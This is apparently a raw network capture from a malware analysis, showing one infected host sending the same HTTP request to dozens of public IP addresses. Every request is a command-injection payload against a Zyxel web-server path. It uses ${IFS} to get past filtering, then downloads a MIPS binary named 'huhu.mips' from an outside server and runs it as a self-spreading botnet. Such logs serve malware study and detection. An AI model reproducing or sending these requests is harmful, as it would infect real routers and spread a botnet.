                                            Feb 2, 2024 06:21:00.390580893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1174192.168.2.1554638180.164.28.173443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.390619040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1175192.168.2.153621896.147.42.254443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.390666962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1176192.168.2.155161252.111.195.44443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.390697956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1177192.168.2.1536724196.223.252.56443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.390728951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1178192.168.2.1549022160.187.54.72443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.390785933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1179192.168.2.156016497.77.107.14443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.390827894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1180192.168.2.1537922173.43.54.207443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.390841961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1181192.168.2.1534570171.72.102.50443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.390894890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1182192.168.2.1545230116.142.219.242443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.390949965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1183192.168.2.153519634.123.113.147443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.390988111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1184192.168.2.1555992209.142.210.253443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.391033888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1185192.168.2.1555170100.177.230.61443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.391068935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1186192.168.2.1539962165.71.184.137443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.391124010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1187192.168.2.1554212169.104.4.74443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.391134024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1188192.168.2.1538622195.22.192.124443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.391187906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1189192.168.2.154677091.144.9.79443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.391222954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1190192.168.2.1560698158.226.197.102443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.391241074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1191192.168.2.1560488180.47.140.42443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.391267061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1192192.168.2.1556288148.26.7.5443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.391288996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1193192.168.2.155659247.26.218.194443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.391318083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1194192.168.2.1560836140.114.52.109443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.391350031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1195192.168.2.1540178183.78.1.116443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.391390085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1196192.168.2.1557390142.106.171.245443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.391438961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1197192.168.2.1549356161.32.81.116443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.391472101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1198192.168.2.153612438.158.99.44443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.391510963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1199192.168.2.155564858.153.49.24443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.391535044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1200192.168.2.153514817.66.9.50443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.391563892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1201192.168.2.154492639.174.253.129443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.391587019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1202192.168.2.1541266135.195.97.137443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.391649008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1203192.168.2.1544042105.148.144.184443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.391714096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1204192.168.2.1558106147.3.94.206443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.391730070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1205192.168.2.1557434128.130.215.85443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.391784906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1206192.168.2.1549512189.213.85.63443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.391812086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1207192.168.2.1554242171.158.240.52443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.391829967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1208192.168.2.15535888.65.73.236443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.391868114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1209192.168.2.153592091.214.67.235443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.391908884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1210192.168.2.1551842109.155.112.175443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.391971111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1211192.168.2.1551440151.110.69.125443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.392009974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1212192.168.2.1540196207.177.234.99443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.392052889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1213192.168.2.153960289.39.74.255443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.392090082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1214192.168.2.1547542145.66.66.181443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.392138958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1215192.168.2.153973832.66.44.17443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.392163038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1216192.168.2.153429623.27.39.187443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.392301083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1217192.168.2.153654037.16.18.225443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.392321110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1218192.168.2.1545988174.193.197.111443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.392364979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1219192.168.2.1545234121.12.6.251443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.392409086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1220192.168.2.155293491.161.82.67443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.392465115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1221192.168.2.1551510188.53.229.111443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.392491102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1222192.168.2.1538582164.56.106.246443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.392548084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1223192.168.2.1547562147.35.148.176443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.392581940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1224192.168.2.1555186103.234.19.244443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.392611980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1225192.168.2.154721064.241.79.189443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.392658949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1226192.168.2.1546886131.14.54.96443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.392719984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1227192.168.2.155066452.88.31.67443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.392755985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1228192.168.2.1548134115.251.52.222443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.392786980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1229192.168.2.155448023.185.173.68443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.392829895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1230192.168.2.155571838.233.172.58443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.392851114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1231192.168.2.1536582185.200.40.209443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.392915964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1232192.168.2.154376442.191.209.90443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.392936945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1233192.168.2.1553832116.147.99.42443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.392997026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1234192.168.2.154415092.185.6.231443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.393030882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1235192.168.2.155987495.155.163.206443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.393058062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1236192.168.2.15423448.166.174.154443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.393086910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1237192.168.2.153321267.237.166.142443
                                            TimestampBytes transferredDirectionData
